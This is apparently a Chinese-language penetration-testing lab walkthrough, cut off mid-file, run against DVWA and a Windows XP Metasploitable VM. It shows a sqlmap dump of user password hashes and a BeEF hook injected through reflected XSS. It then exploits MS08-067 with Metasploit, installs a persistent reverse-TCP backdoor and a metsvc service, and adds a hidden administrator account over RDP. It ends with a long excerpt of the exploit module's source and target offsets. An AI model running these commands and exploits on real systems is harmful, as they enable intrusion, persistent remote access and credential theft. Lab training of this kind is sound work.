[password21:58:19' for hash '] [5f4dcc3b5aa765d61d8327deb882cf99INFO'
Database: dvwa
Table: users
[5 entries]
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| user_id | user    | avatar                                          | password                                    | last_name | first_name |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+
| 1       | admin   | http://owaspbwa/dvwa/hackable/users/admin.jpg   | 21232f297a57a5a743894a0e4a801fc3 (admin)    | admin     | admin      |
| 2       | gordonb | http://owaspbwa/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
| 3       | 1337    | http://owaspbwa/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
| 4       | pablo   | http://owaspbwa/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
| 5       | smithy  | http://owaspbwa/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
+---------+---------+-------------------------------------------------+---------------------------------------------+-----------+------------+

[21:58:30] [INFO] table 'dvwa.users' dumped to CSV file 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129\dump\dvwa\users.csv'
[21:58:30] [INFO] fetched data logged to text files under 'C:\Users\IDEA\AppData\Local\sqlmap\output\10.10.10.129'

跨站脚本攻击

XSSF已经停止维护,使用Beef-XSS

https://github.com/beefproject/beef/

启动Kali Linux安装Beef-XSS

cd /etc/
git clone https://github.com/beefproject/beef.git
cd beef
./install

启动Beef

./beef

提示默认用户名和口令需要修改

root@DESKTOP-9I2FBB4:/etc/beef# ./beef
[22:52:19][!] ERROR: Default username and password in use!
[22:52:19]    |_  Change the beef.credentials.passwd in config.yaml
vi config.yaml
# Copyright (c) 2006-2022 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# BeEF Configuration file

beef:
    version: '0.5.4.0'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    # Used for generating secure tokens
    crypto_default_value_length: 80

    # Credentials to authenticate in BeEF.
    # Used by both the RESTful API and the Admin interface
    credentials:
        user:   "beef"
        passwd: "beef"

    # Interface / IP restrictions
    restrictions:
        # subnet of IP addresses that can hook to the framework
        permitted_hooking_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that can connect to the admin UI
        #permitted_ui_subnet: ["127.0.0.1/32", "::1/128"]
        permitted_ui_subnet: ["0.0.0.0/0", "::/0"]
        # subnet of IP addresses that cannot be hooked by the framework
        excluded_hooking_subnet: []
        # slow API calls to 1 every  api_attempt_delay  seconds
        api_attempt_delay: "0.05"

    # HTTP server
    http:
        debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
        host: "0.0.0.0"
        port: "3000"

        # Decrease this setting to 1,000 (ms) if you want more responsiveness
        #  when sending modules and retrieving results.
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
        xhr_poll_timeout: 1000

        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        # These settings will be used to create a public facing URL
        # This public facing URL will be used for all hook related calls
        # set the public setting below:
        # public:
        #     host: "" # public hostname/IP address
        #     port: "" # public port will default to 80 if no https 443 if https
                      # and local if not set but there is a public host
        #     https: false # true/false

        # Reverse Proxy / NAT
        # If you want BeEF to be accessible behind a reverse proxy or NAT,
        #   set both the publicly accessible hostname/IP address and port below:
        # NOTE: Allowing the reverse proxy will enable a vulnerability where the ui/panel can be spoofed
        #   by altering the X-FORWARDED-FOR ip address in the request header.
        allow_reverse_proxy: false

        # Hook
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"

        # Allow one or multiple origins to access the RESTful API using CORS
        # For multiple origins use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"

        # Prefer WebSockets over XHR-polling when possible.
        websocket:
            enable: false
            port: 61985 # WS: good success rate through proxies
            # Use encrypted 'WebSocketSecure'
            # NOTE: works only on HTTPS domains and with HTTPS support enabled in BeEF
            secure: true
            secure_port: 61986 # WSSecure
            ws_poll_timeout: 5000 # poll BeEF every x second, this affects how often the browser can have a command exec
ute on it
            ws_connect_timeout: 500 # useful to help fingerprinting finish before establishing the WS channel

        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
            hook_404: false # inject BeEF hook in HTTP 404 responses
            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # Enabled this config setting if you're external facing uri is using https
            public_enabled: false
            # In production environments, be sure to use a valid certificate signed for the value
            # used in beef.http.public (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"

    database:
        file: "beef.db"

    # Autorun Rule Engine
    autorun:
        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterva
l
        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or event
ually
        # continue execution regardless of results.
        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase th
e timeout.
        result_poll_interval: 300
        result_poll_timeout: 5000

        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
        continue_after_timeout: true

    # Enables DNS lookups on zombie IP addresses
    dns_hostname_lookup: false

    # IP Geolocation
    geoip:
        enable: true
        # GeoLite2 City database created by MaxMind, available from https://www.maxmind.com
        database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

    # Integration with PhishingFrenzy
    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
    integration:
        phishing_frenzy:
            enable: false

    # You may override default extension configuration parameters here
    # Note: additional experimental extensions are available in the 'extensions' directory
    #       and can be enabled via their respective 'config.yaml' file
    extension:
        admin_ui:
            enable: true
            base_path: "/ui"
        demos:
            enable: true
        events:
            enable: true
        evasion:
            enable: false
        requester:
            enable: true
        proxy:
            enable: true
        network:
            enable: true
        metasploit:
            enable: false
        social_engineering:
            enable: true
        xssrays:
            enable: true

修改user和password后启动Beef

./beef

提示信息先标记一下

[22:56:06][*] running on network interface: 10.10.10.128
[22:56:06]    |   Hook URL: http://10.10.10.128:3000/hook.js
[22:56:06]    |_  UI URL:   http://10.10.10.128:3000/ui/panel
[22:56:06][*] RESTful API key: b2400041e8e3f03c5ee4adcf8ca5cb5e620edd04
[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'
[22:56:06][*] HTTP Proxy: http://127.0.0.1:6789
[22:56:06][*] BeEF server started (press control+c to stop)

里面含有hook信息

Hook URL: http://10.10.10.128:3000/hook.js

因此构造的javascript脚本应为

<script src="http://10.10.10.128:3000/hook.js"></script>

访问Beef控制台

http://127.0.0.1:3000/ui/panel

在这里插入图片描述在这里插入图片描述
设置DVWA Security为Low后选择XSS reflected,输入javascript代码点击Submit
在这里插入图片描述能够看到主机信息
在这里插入图片描述其中Location根据报错信息需要GeoIP,可在我的资源中下载

[22:56:06][!] [GeoIP] Could not find MaxMind GeoIP database: '/usr/share/GeoIP/GeoLite2-City.mmdb'

在这里插入图片描述
备注:跨站脚本攻击在互联网上攻击需要有互联网IP地址

网络服务渗透

MS08067

search ms08_067
msf6 > search ms08_067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set RHOST 192.168.10.128
set LPORT 5000
set LHOST 10.10.10.128
set target 7
exploit
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] 192.168.10.128:445 - Attempting to trigger the vulnerability...
[*] Started bind TCP handler against 192.168.10.128:5000
[*] Sending stage (175174 bytes) to 192.168.10.128
[*] Meterpreter session 1 opened (192.168.10.1:2231 -> 192.168.10.128:5000 ) at 2022-04-16 11:42:28 +0800

meterpreter > sysinfo
Computer        : DH-CA8822AB9589
OS              : Windows XP (5.1 Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows

添加开机启动项,当开机时连接攻击主机10.10.10.128的443端口

run persistence -X -i 5 -p 443 -r 10.10.10.128
meterpreter > run persistence -X -i 5 -p 443 -r 10.10.10.128

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at C:/Users/IDEA/.msf4/logs/persistence/DH-CA8822AB9589_20220417.5804/DH-CA8822AB9589_20220417.5804.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=443
[*] Persistent agent script is 99622 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\GbwkRkc.vbs
[*] Executing script C:\WINDOWS\TEMP\GbwkRkc.vbs
[+] Agent executed with PID 4044
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MNeInNfOCaA

当攻击目标重启后可从已有后门连接已攻击完成主机

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LHOST 10.10.10.128
set LPORT 443
exploit
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > exploit

[*] Started bind TCP handler against :443

使用metsvc将Meterpreter以系统服务的形式安装到目标主机

run metsvc
meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try exploit/windows/local/persistence.
[!] Example: run exploit/windows/local/persistence OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\WINDOWS\TEMP\uIaJuExSqtDr...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
         * Installing service metsvc
 * Starting service
Service metsvc successfully installed.

meterpreter >

开启目标主机远程桌面并添加用户账户

run post/windows/manage/enable_rdp
meterpreter > run post/windows/manage/enable_rdp

[*] Enabling Remote Desktop
[*]     RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*]     The Terminal Services service is not set to auto, changing it to auto ...
[*]     Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt

在WinXP Metasploitable中可以看到远程桌面已开启
在这里插入图片描述

run getgui -u metasploit -p meterpreter
meterpreter > run getgui -u metasploit -p meterpreter

[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Setting user account for logon
[*]     Adding User: metasploit with Password: meterpreter
[*]     Hiding user from Windows Login screen
[*]     Adding User: metasploit to local group 'Remote Desktop Users'
[*]     Adding User: metasploit to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc

在WinXP Metasploitable中可以看到添加的用户情况
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
获取权限

getsystem

查看当前权限

getuid

system权限是系统的最高权限

提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc清除痕迹,关闭痕迹和删除添加的账号

[*] For cleanup use command: run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1259.rc
run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/logs/scripts/getgui/clean_up__20220417.1737.rc
[*] Running Command List ...
[*]     Running command execute -H -f cmd.exe -a "/c net user metasploit /delete"
Process 2956 created.
[*]     Running command reg deleteval -k HKLM\\SOFTWARE\\Microsoft\\Windows\ NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList -v metasploit
Successfully deleted metasploit.

刷新用户,在WinXP Metasploitable中可以看到添加的用户现已消失
在这里插入图片描述提示信息,在操作完成后,执行C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt清除痕迹,关闭远程桌面

[*] For cleanup execute Meterpreter resource file: C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
meterpreter > run multi_console_command -r C:/Users/IDEA/.msf4/loot/20220417153219_default_192.168.10.128_host.windows.cle_582283.txt
[*] Running Command List ...
[*]     Running command reg setval -k 'HKLM\System\CurrentControlSet\Control\Terminal Server' -v 'fDenyTSConnections' -d "1"
Successfully set fDenyTSConnections of REG_SZ.
[*]     Running command execute -H -f cmd.exe -a "/c sc config termservice start= disabled"
Process 3264 created.
[*]     Running command execute -H -f cmd.exe -a "/c sc stop termservice"
Process 2880 created.
[*]     Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 3180 created.

在WinXP Metasploitable中可以看到远程桌面已关闭
在这里插入图片描述

查看MS08067源代码

exploit/windows/smb/ms08_067_netapi
C:\metasploit-framework\embedded\framework\modules\exploits\windows\smb\ms08_067_netapi.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::SMB::Client

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS08-067 Microsoft Server Service Relative Path Stack Corruption',
      'Description'    => %q{
          This module exploits a parsing flaw in the path canonicalization code of
        NetAPI32.dll through the Server Service. This module is capable of bypassing
        NX on some operating systems and service packs. The correct target must be
        used to prevent the Server Service (along with a dozen others in the same
        process) from crashing. Windows XP targets seem to handle multiple successful
        exploitation events, but 2003 targets will often crash or hang on subsequent
        attempts. This is just the first version of this module, full support for
        NX bypass on 2003, along with other platforms, is still in development.
      },
      'Author'         =>
        [
          'hdm', # with tons of input/help/testing from the community
          'Brett Moore <brett.moore[at]insomniasec.com>',
          'frank2 <frank2[at]dc949.org>', # check() detection
          'jduck', # XP SP2/SP3 AlwaysOn DEP bypass
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          %w(CVE 2008-4250),
          %w(OSVDB 49243),
          %w(MSB MS08-067),
          # If this vulnerability is found, ms08-67 is exposed as well
          ['URL', 'http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 408,
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40",
          'Prepend'  => "\x81\xE4\xF0\xFF\xFF\xFF", # stack alignment
          'StackAdjustment' => -3500,

        },
      'Platform'       => 'win',
      'DefaultTarget'  => 0,
      'Targets'        =>
        [
          #
          # Automatic targetting via fingerprinting
          #
          ['Automatic Targeting', { 'auto' => true }],

          #
          # UNIVERSAL TARGETS
          #

          #
          # Antoine's universal for Windows 2000
          # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
          #
          ['Windows 2000 Universal',
           {
             'Ret'       => 0x001f1cb0,
             'Scratch'   => 0x00020408,
           }
          ], # JMP EDI SVCHOST.EXE

          #
          # Standard return-to-ESI without NX bypass
          # Warning: DO NOT CHANGE THE OFFSET OF THIS TARGET
          #
          ['Windows XP SP0/SP1 Universal',
           {
             'Ret'       => 0x01001361,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE

          # Standard return-to-ESI without NX bypass
          ['Windows 2003 SP0 Universal',
           {
             'Ret'       => 0x0100129e,
             'Scratch'   => 0x00020408,
           }
          ], # JMP ESI SVCHOST.EXE

          #
          # ENGLISH TARGETS
          #

          # jduck's AlwaysOn NX Bypass for XP SP2
          ['Windows XP SP2 English (AlwaysOn NX)',
           {
             # No pivot is needed, we drop into our rop
             'Scratch' => 0x00020408,
             'UseROP'  => '5.1.2600.2180'
           }
          ],

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 English (NX)',
           {
             'Ret'       => 0x6f88f727,
             'DisableNX' => 0x6f8916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # jduck's AlwaysOn NX Bypass for XP SP3
          ['Windows XP SP3 English (AlwaysOn NX)',
           {
             # No pivot is needed, we drop into our rop
             'Scratch' => 0x00020408,
             'UseROP'  => '5.1.2600.5512'
           }
          ],

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 English (NX)',
           {
             'Ret'       => 0x6f88f807,
             'DisableNX' => 0x6f8917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          #
          # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
          #

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Arabic (NX)',
           {
             'Ret'       => 0x6fd8f727,
             'DisableNX' => 0x6fd916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Traditional / Taiwan (NX)',
           {
             'Ret'       => 0x5860f727,
             'DisableNX' => 0x586116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Simplified (NX)',
           {
             'Ret'       => 0x58fbf727,
             'DisableNX' => 0x58fc16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Chinese - Traditional (NX)',
           {
             'Ret'       => 0x5860f727,
             'DisableNX' => 0x586116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Czech (NX)',
           {
             'Ret'       => 0x6fe1f727,
             'DisableNX' => 0x6fe216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Danish (NX)',
           {
             'Ret'       => 0x5978f727,
             'DisableNX' => 0x597916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 German (NX)',
           {
             'Ret'       => 0x6fd9f727,
             'DisableNX' => 0x6fda16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Greek (NX)',
           {
             'Ret'       => 0x592af727,
             'DisableNX' => 0x592b16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Spanish (NX)',
           {
             'Ret'       => 0x6fdbf727,
             'DisableNX' => 0x6fdc16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Finnish (NX)',
           {
             'Ret'       => 0x597df727,
             'DisableNX' => 0x597e16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 French (NX)',
           {
             'Ret'       => 0x595bf727,
             'DisableNX' => 0x595c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Hebrew (NX)',
           {
             'Ret'       => 0x5940f727,
             'DisableNX' => 0x594116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Hungarian (NX)',
           {
             'Ret'       => 0x5970f727,
             'DisableNX' => 0x597116e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Italian (NX)',
           {
             'Ret'       => 0x596bf727,
             'DisableNX' => 0x596c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Japanese (NX)',
           {
             'Ret'       => 0x567fd3be,
             'DisableNX' => 0x568016e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Korean (NX)',
           {
             'Ret'       => 0x6fd6f727,
             'DisableNX' => 0x6fd716e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Dutch (NX)',
           {
             'Ret'       => 0x596cf727,
             'DisableNX' => 0x596d16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Norwegian (NX)',
           {
             'Ret'       => 0x597cf727,
             'DisableNX' => 0x597d16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Polish (NX)',
           {
             'Ret'       => 0x5941f727,
             'DisableNX' => 0x594216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Portuguese - Brazilian (NX)',
           {
             'Ret'       => 0x596ff727,
             'DisableNX' => 0x597016e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Portuguese (NX)',
           {
             'Ret'       => 0x596bf727,
             'DisableNX' => 0x596c16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Russian (NX)',
           {
             'Ret'       => 0x6fe1f727,
             'DisableNX' => 0x6fe216e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Swedish (NX)',
           {
             'Ret'       => 0x597af727,
             'DisableNX' => 0x597b16e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP2 Turkish (NX)',
           {
             'Ret'       => 0x5a78f727,
             'DisableNX' => 0x5a7916e2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Arabic (NX)',
           {
             'Ret'       => 0x6fd8f807,
             'DisableNX' => 0x6fd917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Traditional / Taiwan (NX)',
           {
             'Ret'       => 0x5860f807,
             'DisableNX' => 0x586117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Simplified (NX)',
           {
             'Ret'       => 0x58fbf807,
             'DisableNX' => 0x58fc17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Chinese - Traditional (NX)',
           {
             'Ret'       => 0x5860f807,
             'DisableNX' => 0x586117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Czech (NX)',
           {
             'Ret'       => 0x6fe1f807,
             'DisableNX' => 0x6fe217c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Danish (NX)',
           {
             'Ret'       => 0x5978f807,
             'DisableNX' => 0x597917c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 German (NX)',
           {
             'Ret'       => 0x6fd9f807,
             'DisableNX' => 0x6fda17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Greek (NX)',
           {
             'Ret'       => 0x592af807,
             'DisableNX' => 0x592b17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Spanish (NX)',
           {
             'Ret'       => 0x6fdbf807,
             'DisableNX' => 0x6fdc17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Finnish (NX)',
           {
             'Ret'       => 0x597df807,
             'DisableNX' => 0x597e17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 French (NX)',
           {
             'Ret'       => 0x595bf807,
             'DisableNX' => 0x595c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Hebrew (NX)',
           {
             'Ret'       => 0x5940f807,
             'DisableNX' => 0x594117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Hungarian (NX)',
           {
             'Ret'       => 0x5970f807,
             'DisableNX' => 0x597117c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Italian (NX)',
           {
             'Ret'       => 0x596bf807,
             'DisableNX' => 0x596c17c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
          ['Windows XP SP3 Japanese (NX)',
           {
             'Ret'       => 0x567fd4d2,
             'DisableNX' => 0x568017c2,
             'Scratch'   => 0x00020408
           }
          ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

          # Metasploit's NX bypass for XP SP2/SP3
